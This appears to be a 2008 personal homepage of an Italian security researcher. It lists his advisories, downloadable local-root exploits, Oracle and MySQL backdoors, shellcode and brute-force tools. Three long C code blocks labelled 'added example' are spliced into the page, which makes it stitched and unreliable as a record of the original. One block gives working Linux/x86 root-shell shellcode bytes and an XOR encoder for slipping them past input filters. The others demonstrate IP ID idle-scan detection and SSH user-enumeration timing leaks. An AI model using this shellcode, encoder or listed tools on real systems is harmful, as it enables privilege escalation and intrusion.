0xdeadbeef dot info.
Choose Windows. Choose the eXPerience.
Choose flashy menus on your fucking server.
Choose Exchange. Choose IIS.
Choose Code Red, Nimda, the Lovebug, and a sexy Melissa...
Choose Outlook and end up wondering where your stupid .docs are.
Choose not to choose. Let Micro$oft do it for you.
But why would I want to do a thing like that?
I choose not to be chosen: I choose something else.
The reasons? There are too many reasons.
And who needs reasons when you've got Linux?
(from http://p.ulh.as/)
Welcome to my personal Internet homepage and playground. Even though I'm a busy
guy, I try to keep it as up to date as possible: take a look below for the
(new) stuff. Send feedback to: Marco Ivaldi
<raptor[at]0xdeadbeef.info>
(PGP key).
"Software is like sex. It's better when it's free." -- Linus Torvalds
"A chain is only as strong as its weakest link." -- Charles A. Lindberg
"I have seen the fnords." -- Historical graffiti on Anarchy Bridge, UK
"Testing can prove the presence of bugs, but not their absence." -- E. Dijkstra
"Hi, my name is Pete and I'm an OSSTMM user." -- Pete Herzog
"The GNU people aren't evil." -- /usr/src/linux/Documentation/CodingStyle
"There are always errors in real data." -- The AWK Programming Language
"When cryptography is outlawed, bayl bhgynjf jvyy unir cevinpl." -- Anonymous
I'm a computer security researcher and consultant, a software developer,
and a UNIX system
administrator. My particular interests are networking (from
old-style X.25 packet switched networks
to modern SAT links), telephony (fixed, mobile, and VoIP), and cryptology.
I'm currently employed as Red Team Coordinator at
@ Mediaservice.net, a leading
information security company based in Italy: my daily tasks include advanced
penetration testing, ISMS deployment and audit, vulnerability research and
exploit development. I hold the
OPST certification.
I'm also a technical writer: my articles are published in various computing
magazines. I'm founder and editorial board member of
Linux&C (the first Italian
magazine about Linux and open source), Linux Pratico, and H&C. Finally, I
write for some web portals about hacking, security, and privacy in
the digital age.
I'm an OpenBSD and
FreeBSD aficionado. When I have to use
Linux, I choose my first love
Slackware.
Here's the list of my current projects related to computing and information
security.
- Antifork Research. I'm one of the founders of the project (formerly known as the disLESSici team).
- Blackhats.it. This is the old site of the ITBH security research community (now closed).
- TSTF. I'm a member of the Telecom Security Task Force, involved in telco-related research.
- OSSTMM. I'm an active contributor and supporter of the Open Source Security Testing Methodology.
- Lab @ Media. This is the on-line repository of research projects sponsored by my employer.
- CrISTAL. I'm involved in the Critical Infrastructures Security Test & Analysis Lab (SCADA).
- Opensource. I'm the maintainer of the official Italian WWW mirror of the Open Source Initiative (OSI).
- OpenBSD. My employer is currently hosting the Italian WWW mirror of the OpenBSD project.
This is a collection of miscellaneous research papers, presentations, and
advisories I've written or reviewed. Some documents are in Italian: maybe I'll
bother to translate them to English in the future. Other papers of mine
released into the public domain can be found in the archives of
bugtraq
(the first public computer security vulnerability mailing list),
vuln-dev
(an exploit development mailing list),
pen-test
(a penetration testing and network auditing mailing list),
full-disclosure
(an unmoderated high-traffic list for disclosure of security information), and
sikurezza.org
(the first Italian computer security mailing list), along with other
similar security resources on the Internet (see also the Links section below)
and of course the magazines I write for.
Articles and Books.
Whitepapers and Presentations.
Advisories.
- CVE-2003-0190. I discovered and published this OpenSSH/PAM Delay Information Disclosure Vulnerability.
- CVE-2006-1242. I discovered and published this Linux Kernel IP ID Information Disclosure Weakness.
- CVE-2006-5229. I discovered and published yet another OpenSSH information disclosure via timing leak.
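The weakness class behind CVE-2006-1242 is easy to test for from the outside, so here is an added example (my illustration for this page, not the advisory's code): it pulls the Identification field out of raw IPv4 headers captured from one host and decides whether the IDs come from a single global counter (which lets a remote observer count the packets the host sent between two probes, the basis of idle scanning), are always zero, or look random. The sample headers, the `slack` tolerance and the classification thresholds are this example's own assumptions.

```c
/* Added example, not code from this page or its author: the check behind the
 * CVE-2006-1242 class of IP ID information disclosure. A host whose IPv4
 * Identification field comes from one global counter tells a remote observer
 * how many packets it sent between two probes (the basis of idle/zombie
 * scanning and traffic counting); zero or per-connection random IDs do not.
 * Sample headers are constructed below; the classification thresholds are
 * this example's own choice. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

enum ipid_scheme { IPID_UNKNOWN = 0, IPID_ZERO, IPID_INCREMENTAL, IPID_RANDOM };

/* Identification field (bytes 4-5, network byte order) of a raw IPv4 header,
 * or -1 if the buffer does not look like one. */
static int ipv4_id(const uint8_t *pkt, size_t len)
{
    if (len < 20 || (pkt[0] >> 4) != 4 || (pkt[0] & 0x0f) < 5)
        return -1;
    return (pkt[4] << 8) | pkt[5];
}

/* Classify a sequence of IDs observed from one host, in order of arrival.
 * `slack` is how many packets to third parties we tolerate between our own
 * probes before a delta stops looking like a single shared counter. Anything
 * that is neither all-zero nor consistently incrementing (mod 2^16) is
 * reported as random, the safe assumption for the attacker. */
static enum ipid_scheme classify_ipids(const int *ids, size_t n, unsigned slack)
{
    size_t i, zeros = 0, incr = 0;

    if (n < 2)
        return IPID_UNKNOWN;
    for (i = 0; i < n; i++)
        if (ids[i] == 0)
            zeros++;
    if (zeros == n)
        return IPID_ZERO;
    for (i = 1; i < n; i++) {
        unsigned d = (unsigned)(ids[i] - ids[i - 1]) & 0xffffu;
        if (d >= 1 && d <= 1 + slack)
            incr++;
    }
    return incr == n - 1 ? IPID_INCREMENTAL : IPID_RANDOM;
}

/* Build a minimal 20-byte IPv4/TCP header carrying `id` (constructed sample
 * input; the checksum is left zero since nothing here verifies it). */
static void make_ipv4_header(uint8_t out[20], uint16_t id)
{
    memset(out, 0, 20);
    out[0] = 0x45;                  /* version 4, IHL 5 */
    out[3] = 20;                    /* total length     */
    out[4] = (uint8_t)(id >> 8);
    out[5] = (uint8_t)(id & 0xff);
    out[8] = 64;                    /* TTL              */
    out[9] = 6;                     /* protocol: TCP    */
}

/* Parse up to 64 raw headers from one host and classify its ID scheme. */
static enum ipid_scheme classify_packets(const uint8_t (*pkts)[20], size_t n,
                                         unsigned slack)
{
    int ids[64];
    size_t i;

    if (n > 64)
        n = 64;
    for (i = 0; i < n; i++) {
        ids[i] = ipv4_id(pkts[i], 20);
        if (ids[i] < 0)
            return IPID_UNKNOWN;
    }
    return classify_ipids(ids, n, slack);
}

int main(void)
{
    /* A "zombie" that uses one global counter and sent two other packets
     * between our 3rd and 4th probe (IDs 0x1002 -> 0x1005). */
    static const uint16_t seq[] = { 0x1000, 0x1001, 0x1002, 0x1005, 0x1006 };
    uint8_t pkts[5][20];
    size_t i;

    for (i = 0; i < 5; i++)
        make_ipv4_header(pkts[i], seq[i]);
    printf("slack 0: %d, slack 2: %d (1=zero 2=incremental 3=random)\n",
           classify_packets(pkts, 5, 0), classify_packets(pkts, 5, 2));
    return 0;
}
```

Against a real target you would feed `ipv4_id()` the headers of replies to your own probes (SYN/ACK to a closed port gets you an RST without involving any application); the `slack` value is a judgement call, since a busy host legitimately has gaps, while a host with a per-destination or random ID never shows a run of small positive deltas no matter how quiet it is.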
Here you can download some of the exploits and proof-of-concept code I've
developed during my vulnerability research activities on multiple platforms.
For educational purposes only, standard disclaimer applies.
Linux.
- raptor_chown.c. Linux 2.6.x < 2.6.7-rc3 (CVE-2004-0497). Missing DAC controls in sys_chown() on Linux.
- raptor_prctl.c. Linux 2.6.x from 2.6.13 up to versions before 2.6.17.4 (CVE-2006-2451). Suid_dumpable bug.
- raptor_prctl2.c. Linux 2.6.x from 2.6.13 up to versions before 2.6.17.4 (CVE-2006-2451). Via logrotate(8).
- raptor_truecrypt.tgz. TrueCrypt <= 4.3 (CVE-2007-1738). Local privilege escalation via setuid volume mount.
Solaris/x86.
- raptor_ucbps. Solaris 8, 9 (CVE-1999-1587). Information leak with /usr/ucb/ps on both SPARC and x86.
- raptor_sysinfo.c. Solaris 10 (CVE-2006-3824). Kernel memory disclosure with the sysinfo(2) system call.
- raptor_libnspr. Solaris 10 (CVE-2006-4842). NSPR library arbitrary file creation oldschool local root.
- raptor_libnspr2. Solaris 10 (CVE-2006-4842). NSPR library arbitrary file creation local root via LD_PRELOAD.
- raptor_libnspr3. Solaris 10 (CVE-2006-4842). NSPR library arbitrary file creation local root via constructor.
- raptor_peek.c. Solaris 8, 9, 10 (CVE-2007-5225). Kernel memory disclosure with fifofs I_PEEK ioctl(2).
Solaris/SPARC.
- raptor_ucbps. Solaris 8, 9 (CVE-1999-1587). Information leak with /usr/ucb/ps on both SPARC and x86.
- raptor_rlogin.c. Solaris 2.5.1, 2.6, 7, 8 (CVE-2001-0797). Buffer overflow in System V login via rlogin vector.
- raptor_ldpreload.c. Solaris 2.6, 7, 8, 9 (CVE-2003-0609). Stack-based buffer overflow in the runtime linker ld.so.1.
- raptor_libdthelp.c. Solaris 7, 8, 9 (CVE-2003-0834). Buffer overflow in CDE libDtHelp via dtprintinfo help feature.
- raptor_libdthelp2.c. Solaris 7, 8, 9 (CVE-2003-0834). Buffer overflow in CDE libDtHelp, non-exec stack version.
- raptor_passwd.c. Solaris 8, 9 (CVE-2004-0360). Stack-based buffer overflow in the circ() function of passwd(1).
- raptor_sysinfo.c. Solaris 10 (CVE-2006-3824). Kernel memory disclosure with the sysinfo(2) system call.
- raptor_xkb.c. Solaris 8, 9, 10 (CVE-2006-4655). Buffer overflow in the Strcmp() function of X11 XKEYBOARD.
- raptor_libnspr. Solaris 10 (CVE-2006-4842). NSPR library arbitrary file creation oldschool local root.
- raptor_libnspr2. Solaris 10 (CVE-2006-4842). NSPR library arbitrary file creation local root via LD_PRELOAD.
- raptor_libnspr3. Solaris 10 (CVE-2006-4842). NSPR library arbitrary file creation local root via constructor.
- raptor_peek.c. Solaris 8, 9, 10 (CVE-2007-5225). Kernel memory disclosure with fifofs I_PEEK ioctl(2).
Oracle.
- raptor_oraextproc.sql. Oracle 9i, 10g (CVE-2004-1364). Directory traversal vulnerability in extproc.
- raptor_oraexec.sql. Exploitation suite for Oracle written in Java, to read/write files and execute OS commands.
- raptor_orafile.sql. File system access suite for Oracle based on the utl_file package, to read/write files.
MySQL.
- raptor_udf.c. Helper dynamic library for local privilege escalation through MySQL run with root privileges.
- raptor_udf2.c. Slight modification of raptor_udf.c, it works with recent versions of the open-source database.
- raptor_winudf.tgz. MySQL reverse shell and command execution UDFs backdoor kit for M$ Windows.
Misc.
- raptor_sshtime. OpenSSH (CVE-2003-0190, CVE-2006-5229). Remote timing attack information leak exploit.
- raptor_dominohash. Lotus Domino R5, R6 (CVE-2005-2428). Webmail names.nsf password hash dumper.
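The two OpenSSH advisories above (CVE-2003-0190, CVE-2006-5229) and the raptor_sshtime exploit are all about the same bug class: a login path that does a different amount of work, or applies the failure delay only on one branch, depending on whether the account exists. The following is an added example written for this page, not OpenSSH's or the author's code, that reduces the class to its essence: a leaky `auth_leaky()` next to a uniform-cost `auth_uniform()`, with a stand-in "slow hash" that counts work units so the difference is visible deterministically instead of with a stopwatch. The user database, the hash stand-in and the function names are this example's own.

```c
/* Added example, not OpenSSH's or this page's code: the timing-leak bug
 * class behind the OpenSSH advisories above, reduced to its essence. The
 * leaky routine returns before doing any expensive work when the user is
 * unknown, so failed logins for nonexistent accounts are measurably faster
 * than failed logins for real ones. The hardened routine always performs
 * the same work against a dummy record. slow_hash() is a stand-in with a
 * work counter, so cost is observable without a stopwatch. */
#include <string.h>
#include <stdio.h>

struct account { const char *name; const char *pwhash; };

/* Constructed user database; "hashes" are plain strings for the example. */
static const struct account db[] = {
    { "root",   "h(correct-horse)" },
    { "raptor", "h(battery-staple)" },
};
static const struct account dummy = { "", "h(dummy)" };

static unsigned long work_units;   /* number of slow_hash() calls so far */

/* Stand-in for a deliberately slow password hash: costs one work unit. */
static const char *slow_hash(const char *pw, char *out, size_t n)
{
    work_units++;
    snprintf(out, n, "h(%s)", pw);
    return out;
}

/* Compare without an early exit on the first differing byte, so the
 * compare step itself does not leak how much of the hash matched. */
static int ct_equal(const char *a, const char *b)
{
    size_t la = strlen(a), lb = strlen(b), i;
    unsigned diff = (la != lb);
    for (i = 0; i < la && i < lb; i++)
        diff |= (unsigned char)(a[i] ^ b[i]);
    return diff == 0;
}

static const struct account *lookup(const char *user)
{
    size_t i;
    for (i = 0; i < sizeof db / sizeof db[0]; i++)
        if (strcmp(db[i].name, user) == 0)
            return &db[i];
    return NULL;
}

/* Vulnerable: unknown user -> no hashing at all -> fast failure. */
static int auth_leaky(const char *user, const char *pw)
{
    char buf[64];
    const struct account *a = lookup(user);
    if (a == NULL)
        return 0;
    return ct_equal(slow_hash(pw, buf, sizeof buf), a->pwhash);
}

/* Hardened: always hash (against a dummy record if the user is unknown)
 * and fold the "user exists" bit into the result afterwards. */
static int auth_uniform(const char *user, const char *pw)
{
    char buf[64];
    const struct account *a = lookup(user);
    int exists = (a != NULL);
    int ok;
    if (!exists)
        a = &dummy;
    ok = ct_equal(slow_hash(pw, buf, sizeof buf), a->pwhash);
    return ok & exists;
}

/* What one attempt costs; a remote attacker measures this as wall time. */
static unsigned long cost_of(int (*auth)(const char *, const char *),
                             const char *user, const char *pw)
{
    work_units = 0;
    auth(user, pw);
    return work_units;
}

int main(void)
{
    printf("leaky:   nobody=%lu raptor=%lu\n",
           cost_of(auth_leaky, "nobody", "x"), cost_of(auth_leaky, "raptor", "x"));
    printf("uniform: nobody=%lu raptor=%lu\n",
           cost_of(auth_uniform, "nobody", "x"), cost_of(auth_uniform, "raptor", "x"));
    return 0;
}
```

The same rule applies to any failure delay: it has to be added on every failing branch, including "no such user", or the delay itself becomes the oracle. On the offensive side, the exploit's job is just the measurement, taking many samples per candidate user and comparing medians so network jitter does not drown the gap.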
This section is dedicated to my code: you can download and test some of the
programs I've coded in the past or I'm developing right now. Please note that
most of this stuff is experimental and/or in alpha release: some programs are
simply coding exercises or bugfixes of old legacy code. Standard disclaimer
applies.
New School.
- mssql-hax0r. Multi-purpose SQL injection attack tool for advanced Microsoft SQL Server exploitation.
- samba-hax0r. Multi-purpose attack tool for SMB/CIFS network protocols exploitation.
- havoc-0.1d.tgz. Random ARP traffic generator, BOFH style. It can temporarily hose an ethernet segment.
- ikenum. Script for remote enumeration of supported ISAKMP authentication methods (RFC 2409).
- oracrack. Oracle database password cracking helper, to be used with the checkpwd cracker.
- orabackdoor.sql. Proof-of-concept code to demonstrate how to write a simple backdoor for Oracle.
- scan-tools.tgz. A collection of easily customizable bash scripts for network scanning purposes.
- sequel.tgz. A growing collection of simple scripts for performing multiple tasks via SQL injection attacks.
Old School.
- brutus.pl. Remote login/password bruteforce cracker for TELNET, FTP, POP3, SMTP, and HTTP protocols.
- ward.c. Fast wardialer for UNIX systems, it scans a list of phone numbers hunting for active modems.
- rasbrute.bat. Very basic and easily customizable DOS batch script for remote bruteforcing of M$ PPTP.
- x25-tools.tgz (new). A collection of multi-purpose X.25 scanners based on vudu, including nuascan and cudscan.
- psibrute.com. This DCL script abuses the old PSI_MAIL trick on VMS/OpenVMS to remotely find valid users.
- backdoor.bas. Simple VMS/OpenVMS lib$spawn() setuid-like backdoor (easily portable to other languages).
- autoscan.pl. Autonet NUA scanner for the old autonet x25pad gateway, based on the brutus.pl engine.
Exploitation.
Shellcode.
- setuid-linux.c. Short (30 bytes) shellcode for Linux/x86, executing a setuid(0) and an execve() of /bin/sh.
- gets-linux.c. Linux/x86 shellcode for stdin re-open and /bin/sh exec. Useful to exploit some gets() overflows.
- reusage-linux.c. Linux/x86 shellcode for /bin/sh string re-usage from vulnerable program (16 bytes only).
- portbind-linux.c. Simple Linux/x86 portbind shellcode, spawning a setuid(0) shell on port 31337/tcp (96 bytes).
- setuid-bsd.c. Short (31 bytes) shellcode for BSD/x86, executing an execve() of /bin/sh after a setuid(0).
- portbind-bsd.c. Simple BSD/x86 portbind shellcode, spawning a setuid(0) shell on port 31337/tcp (94 bytes).
- raptorcode.c. Another shellcode for Linux/x86 that prints "Raptor owns your safe\n" on your current tty.
- leetcode.c. Another setuid(0)/execve() shellcode for BSD/x86, with a nice ascii message buried into it.
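Before any of the shellcodes above goes into an overflow you check it for bytes the vulnerable input path will not pass, and if some are present you encode it. Here is an added example (written for this page, not one of the linked shellcodes) that does both: a bad-byte scanner and a single-byte XOR encoder that picks a key such that neither the key nor any encoded byte is bad, which is the transform a small decoder stub in front of the payload would undo at run time. The payload it inspects is the textbook 32-byte Linux/x86 setuid(0) + execve("/bin//sh") sequence, written out here for the example (the page's own setuid-linux.c is 30 bytes); the bad-byte sets are constructed for the demonstration and the bytes are only inspected, never executed.

```c
/* Added example, not the shellcodes linked above: two checks to run on a
 * payload such as setuid-linux.c before planting it in an overflow.
 * (1) Scan for "bad" bytes the vulnerable input path would truncate or
 *     mangle (0x00 for strcpy()/sprintf()-style bugs, 0x0a for line
 *     readers, 0x2f where a path filter strips slashes, and so on).
 * (2) If any are present, XOR-encode the payload with a single-byte key
 *     chosen so that neither the key nor any encoded byte is bad; a decoder
 *     stub placed before the payload undoes this at run time. Only the
 *     encoder side is shown.
 * The payload is the textbook 32-byte Linux/x86 setuid(0) + execve()
 * sequence, written out for this example; it is inspected, never run. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

static const uint8_t sc_setuid_execve[] = {
    0x31, 0xc0,                     /* xor  eax, eax                  */
    0x31, 0xdb,                     /* xor  ebx, ebx                  */
    0xb0, 0x17,                     /* mov  al, 23   ; __NR_setuid    */
    0xcd, 0x80,                     /* int  0x80     ; setuid(0)      */
    0x31, 0xc0,                     /* xor  eax, eax                  */
    0x50,                           /* push eax      ; NUL terminator */
    0x68, 0x2f, 0x2f, 0x73, 0x68,   /* push "//sh"                    */
    0x68, 0x2f, 0x62, 0x69, 0x6e,   /* push "/bin"                    */
    0x89, 0xe3,                     /* mov  ebx, esp ; path           */
    0x50,                           /* push eax      ; argv[1] = NULL */
    0x53,                           /* push ebx      ; argv[0] = path */
    0x89, 0xe1,                     /* mov  ecx, esp ; argv           */
    0x99,                           /* cdq           ; edx = envp = 0 */
    0xb0, 0x0b,                     /* mov  al, 11   ; __NR_execve    */
    0xcd, 0x80                      /* int  0x80                      */
};

static int is_bad(uint8_t b, const uint8_t *bad, size_t nbad)
{
    return nbad != 0 && memchr(bad, b, nbad) != NULL;
}

/* Index of the first byte in the bad set, or -1 if the payload is clean. */
static long first_bad_byte(const uint8_t *sc, size_t len,
                           const uint8_t *bad, size_t nbad)
{
    size_t i;
    for (i = 0; i < len; i++)
        if (is_bad(sc[i], bad, nbad))
            return (long)i;
    return -1;
}

/* Smallest key in 1..255 such that the key itself and every sc[i] ^ key
 * stay out of the bad set; -1 if no single-byte key works. */
static int pick_xor_key(const uint8_t *sc, size_t len,
                        const uint8_t *bad, size_t nbad)
{
    int k;
    for (k = 1; k < 256; k++) {
        size_t i;
        if (is_bad((uint8_t)k, bad, nbad))
            continue;
        for (i = 0; i < len; i++)
            if (is_bad((uint8_t)(sc[i] ^ k), bad, nbad))
                break;
        if (i == len)
            return k;
    }
    return -1;
}

/* Encode sc into out with a key from pick_xor_key(), then verify that the
 * result is clean and decodes back to the original. Returns the key or -1. */
static int xor_encode_clean(const uint8_t *sc, size_t len,
                            const uint8_t *bad, size_t nbad, uint8_t *out)
{
    int key = pick_xor_key(sc, len, bad, nbad);
    size_t i;
    if (key < 0)
        return -1;
    for (i = 0; i < len; i++)
        out[i] = (uint8_t)(sc[i] ^ key);
    if (first_bad_byte(out, len, bad, nbad) != -1)
        return -1;
    for (i = 0; i < len; i++)
        if ((uint8_t)(out[i] ^ key) != sc[i])
            return -1;
    return key;
}

int main(void)
{
    static const uint8_t bad[] = { 0x00, 0x2f };   /* NUL and '/' */
    uint8_t enc[sizeof sc_setuid_execve];
    size_t i;
    int key;

    printf("raw payload: %zu bytes, first bad byte at index %ld\n",
           sizeof sc_setuid_execve,
           first_bad_byte(sc_setuid_execve, sizeof sc_setuid_execve, bad, 2));
    key = xor_encode_clean(sc_setuid_execve, sizeof sc_setuid_execve, bad, 2, enc);
    printf("xor key 0x%02x, encoded:", key);
    for (i = 0; i < sizeof enc; i++)
        printf(" %02x", enc[i]);
    printf("\n");
    return 0;
}
```

The payload is NUL-free as written (that is what the `xor eax,eax` / `push eax` / `cdq` idioms are for), so with the usual `{0x00}` bad set the scanner reports it clean; it is the slashes in "/bin//sh" that trip a `{0x00, 0x2f}` filter, and a key of 0x01 is enough to hide them. Remember that the decoder stub you prepend must itself be free of bad bytes and must know where the encoded body starts, which is why real-world stubs use `jmp/call/pop` or a FPU-based trick to get EIP rather than a hard-coded address.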
Esoteric.
- poly.txt. A polyglot, a program that may be compiled in more than one language (in this case C and Perl).
- poly2.txt. Another simple polyglot. This particular one is interpreted both as a C program or BASH script.
- poly3.txt. A third polyglot. This program works under cc, sh, and csh (polyglot^3).
- poly4.txt. Another small polyglot for cc, perl, sh, and csh (the almost done awk porting is welcome).
Misc.
- pfilter.pl. OpenBSD PF log file filter (parser and colorizer). It supports both /var/log/pflog and pflog0.
- snortctl.tgz. Management script and log parser/colorizer for Snort NIDS, from the early stages of @Aenigma.
- libc-search.c. Quick and easily-adaptable libc symbol/pattern search helper. Tested on Linux.
- cidr.c. Quick parser for Classless Inter Domain Routing (CIDR). It generates an IP address list from ip/cidr.
- bounce.c. Simple netcat-like bouncer client that pipes on localhost an active TCP session.
- p2s.c. Prism2stumbler is a wireless network stumbler for PRISM2 cards. Tested on Linux with wlan-ng.
- ftw.pl. FTP-to-WEB Gateway. HTTP interface to an FTP tree, formerly used on Antifork Research archive.
This section contains some example configuration files and templates for common
security solutions such as Packet Filters, Virtual Private Networks, and
Intrusion Detection Systems, along with OpenBSD and Linux kernel setups I
compiled for my notebook computers. YMMV.
Packet Filters.
- pf.conf.39. Sample PF/NAT ruleset for the configuration of a basic OpenBSD 3.9 stateful firewall.
- pf.conf.39.adsl. Another sample PF/NAT ruleset for an OpenBSD 3.9 stateful firewall optimized for ADSL.
- pf.conf.39.dmz. Sample PF/NAT ruleset for an OpenBSD 3.9 stateful firewall with bridged DMZ on 3rd NIC.
- rc.iptables v1. Sample basic ruleset for the configuration of a Linux 2.4 stateful firewall (host fw + vpn).
- rc.iptables v2. Sample basic ruleset for the configuration of a Linux 2.4 stateful firewall (masq fw + vpn).
- ipf.rules v1. Sample rules for the IPFilter stateful firewall, with detailed comments. Tested on OpenBSD 2.9.
- ipnat.rules v1. Sample rules for the configuration of IPFilter NAT and Proxies. Tested on OpenBSD 2.9.
- ipf.rules v2. Another sample ruleset for IPFilter (DMZ with a 3-NIC firewall). Tested on OpenBSD 2.9.
- ipnat.rules v2. Sample ruleset for IPNat, needed to deploy ipf.rules v2 above. Tested on OpenBSD 2.9.
Virtual Private Networks.
- isakmpd.policy v1. Sample IKE policy file for a basic IPsec VPN. Tested on OpenBSD 2.9.
- isakmpd.conf.1 v1. Sample IKE configuration file for a basic IPsec VPN (#1). Tested on OpenBSD 2.9.
- isakmpd.conf.2 v1. Sample IKE configuration file for a basic IPsec VPN (#2). Tested on OpenBSD 2.9.
- isakmpd.policy v2. IKE policy file for a basic IPsec VPN using X.509 certs. Tested on OpenBSD 3.2.
- isakmpd.conf.1 v2. IKE config file for a basic IPsec VPN using X.509 certs (#1). Tested on OpenBSD 3.2.
- isakmpd.conf.2 v2. IKE config file for a basic IPsec VPN using X.509 certs (#2). Tested on OpenBSD 3.2.
- isakmpd.policy v3. Another IKE policy file for a road warrior IPsec VPN. Tested on OpenBSD 3.2.
- isakmpd.conf.1 v3. Another IKE config file for a road warrior IPsec VPN (server). Tested on OpenBSD 3.2.
- isakmpd.conf.2 v3. Another IKE config file for a road warrior IPsec VPN (client). Tested on OpenBSD 3.2.
Intrusion Detection Systems.
- snort.conf v1.9.0. Sample configuration file for the Network Intrusion Detection System (NIDS) Snort 1.9.0.
- snort.conf v2.0.0. Sample configuration file for the Network Intrusion Detection System (NIDS) Snort 2.0.0.
Operating System Kernels.
- voodoo. OpenBSD 3.5 kernel configuration for my old and glorious Acer TravelMate 345T notebook.
- shaolin. Linux 2.6.21.5 kernel configuration for my brand new ASUS U5F notebook (minimal setup).
First of all, read the BOFH stories by Simon Travaglia, and remember that in disk
space, nobody can hear your files scream! I've also written a small
CGI script that generates a random "excuse of the day".
Dummy mode is forever, enjoy the mighty Bastard Operator From Hell... Also in
his new home! Other cool
stuff follows here.
- Linux Penguin. A cool HTML artwork representing Tux, the Linux Penguin (257 x 303 @ 250 colors).
- OpenBSD Devil. Another extremely cool HTML artwork, portrait of the OpenBSD Devil mascot.
- RTFM. Hey, you! Yeah, you! Don't ask stupid questions, always Read The Fucking Manual before.
- Utah Bengaled Raptor. An impressive 8 foot tall, 1 ton wooden prehistoric monster, created by artist Matt Kron.
- 0xdefaced. This is the archived 0xdeadbeef dot info defacement hoax made for April Fools' Day 2004.
- HP JetDirect Crash. Cool stack dump printed on paper by my HP JetDirect printer after a Denial of Service.
- Insert Coin. My kinda original HP JetDirect printer's new display (yeah, I was bored that day).
- Control Room. ITAPAC (DNIC 2222) is the best-known Italian X.25 network, still alive as of 2006.
- Vi Assistant. Fear the infamous clippy-like assistant for vim. Resistance is futile, you'll be assimilated.
- Sidecar Wardriving. Funny picture of a l33t wardriving session on an original Ural sidecar.
- Pen-test Moderation. Cheap viagra spam and SecurityFocus "penetration" test mailing list moderation fun.
Finally, the Internet links section. I try to keep it short and as up to date
as possible...
Security.
- SecTools. Homepage of the Top 100 Network Security Tools list as surveyed by Fyodor.
- SecLists. Web archives updated in real-time for many full-disclosure mailing lists.
- Milw0rm. A well-maintained and up-to-date exploit collection for various operating systems.
- Pen-test Directory. An attempt to build an organized directory strictly related to the pen-test business.
- Pen-test Framework. Penetration testing framework mindmap, by Toggmeister and Lee J Lawson.
- OWASP. The Open Web Application Security Project: useful information on web application security.
- Database Security. The web's leading resource for database security: very interesting information.
- Hacking AS/400. Homepage of the Hacking iSeries book, free information about AS/400 security.
Coding.
- IOCCC. The International Obfuscated C Code Contest homepage. Voodoo magic.
- Insecure Programming. A nice collection of insecure code for didactical purposes, by gera.
- The Dude. A debugger which resides in kernel memory and provides an alternative to ptrace(2).
- RR0D. Rasta Ring 0 Debugger, a powerful OS-independent debugger by Droids Corporation.
- Boomerang. An attempt at a general, open-source, retargetable decompiler of binary files.
- CC65. CC65 is a freeware C compiler for 6502 based systems (Commodore, Apple, Atari).
- Brainfuck. Brainfuck is an 8-instruction Turing-complete programming language.
- PROTOS. Project aimed at verifying implementations of protocols using black-box testing methods.
Crypto and Privacy.
- Cryptome. Probably the best cryptography and digital privacy resource on the Internet.
- P. Gutmann. Peter Gutmann's homepage, research from a professional paranoid.
- Crypto. Matt Blaze's cryptography resource on the web: very interesting papers.
- GnuPG. The GNU Privacy Guard, an extremely popular free OpenPGP implementation.
- TrueCrypt. Free open-source disk encryption software for both Windows and Linux.
- Tor. An anonymous Internet communication system for TCP-based applications.
- Rainbow Crack. A general-purpose implementation of the faster time-memory trade-off technique for password hash cracking.
- BugMeNot. Useful service to find and share logins for web sites that force you to register.
Telephony.
- Wardialing. A comprehensive collection of wardialing software for UNIX, MS-DOS, and Windows.
- Tactical VoIP. Hardcore VoIP security, distributing the Tactical VoIP Toolkit and VoIPy tools.
- VOIPSA. The Voice over IP Security Alliance aims to fill the void of VoIP security related resources.
- The GSM Software Project. New exciting THC project, aimed at building a GSM receiver.
- Asterisk. An open-source PBX (Private Branch eXchange) based on the Linux OS.
- IPTel. The on-line reference for Internet telephony, home of the SIP Express Router project.
- Dex Page. Here you can download some useful telephony programs, like SimScan.
- SIM-EMU. SIM card emulator, a nice toy for playing with cellular phones and networks.
$Id: index.html,v 1.529 2008/07/30 14:34:11 raptor Exp $